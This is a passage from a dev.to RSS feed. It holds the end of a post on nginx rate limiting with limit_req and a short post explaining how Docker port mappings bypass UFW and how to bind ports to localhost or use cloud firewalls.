&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;limit_req zone=mylimit;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;And that's it! Now only pages matching the $request_uri map will have rate limiting applied. This is handy when all of your requests are routed through a single location block but you only want specific pages on your site rate limited.&lt;/p&gt;
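&lt;p&gt;If you also want to tolerate short bursts from legitimate visitors, the limit_req directive accepts a burst allowance. A hedged variation on the same zone:&lt;/p&gt;

```nginx
location / {
    # Queue up to 10 extra requests above the 5r/s rate and serve them
    # immediately; anything beyond that still gets the 429 status
    # configured above.
    limit_req zone=mylimit burst=10 nodelay;
}
```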

</description>
      <category>nginx</category>
      <category>webdev</category>
      <category>devops</category>
      <category>security</category>
    </item>
    <item>
      <title>Docker Tips - UFW</title>
      <dc:creator>Rhuaridh</dc:creator>
      <pubDate>Sun, 07 Nov 2021 09:22:30 +0000</pubDate>
      <link>https://dev.to/rhuaridh/docker-tips-ufw-3k8o</link>
      <guid>https://dev.to/rhuaridh/docker-tips-ufw-3k8o</guid>
      <description>&lt;h1&gt;
  
  
  Docker Tips - UFW
&lt;/h1&gt;

&lt;p&gt;By default, Docker overrides "Uncomplicated Firewall" (UFW) rules. It is important to be aware of this so that you do not accidentally expose your Docker containers to the world.&lt;/p&gt;

&lt;p&gt;If you had UFW configured to block port 3000, you would be forgiven for assuming the Docker app below would also be blocked.&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;&lt;code&gt;docker run -d -p 3000:5000 training/webapp python app.py&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;However, Docker adds rules to iptables directly. This bypasses UFW, which causes our app to be exposed to the world.&lt;/p&gt;

&lt;h2&gt;
  
  
  Two simple solutions
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1) Bind port to localhost
&lt;/h3&gt;

&lt;p&gt;The problem is that our port mapping flag exposes our app:&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;&lt;code&gt;-p 3000:5000&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;Restricting access to localhost is a simple change:&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;&lt;code&gt;-p 127.0.0.1:3000:5000&lt;/code&gt;&lt;br&gt;
&lt;/p&gt;

&lt;p&gt;This binds port 5000 inside the container to port 3000 on the localhost (127.0.0.1) interface of the host machine.&lt;/p&gt;

&lt;p&gt;Our app is now blocked from external traffic!&lt;/p&gt;
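&lt;p&gt;The same localhost binding works if you manage the container with Docker Compose. A hedged sketch using the demo image from above:&lt;/p&gt;

```yaml
services:
  webapp:
    image: training/webapp
    command: python app.py
    ports:
      # Bind to the loopback interface only, so Docker's iptables
      # rules cannot expose the app to the outside world
      - "127.0.0.1:3000:5000"
```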

&lt;h3&gt;
  
  
  2) Use external firewalls
&lt;/h3&gt;

&lt;p&gt;GCP, AWS and even OVH all have external firewalls that sit in front of the server. Leveraging cloud-based firewalls in addition to UFW is the best way to solve the issue.&lt;/p&gt;

</description>
      <category>docker</category>
      <category>ufw</category>
      <category>security</category>
      <category>firewall</category>
    </item>
  </channel>
</rss>
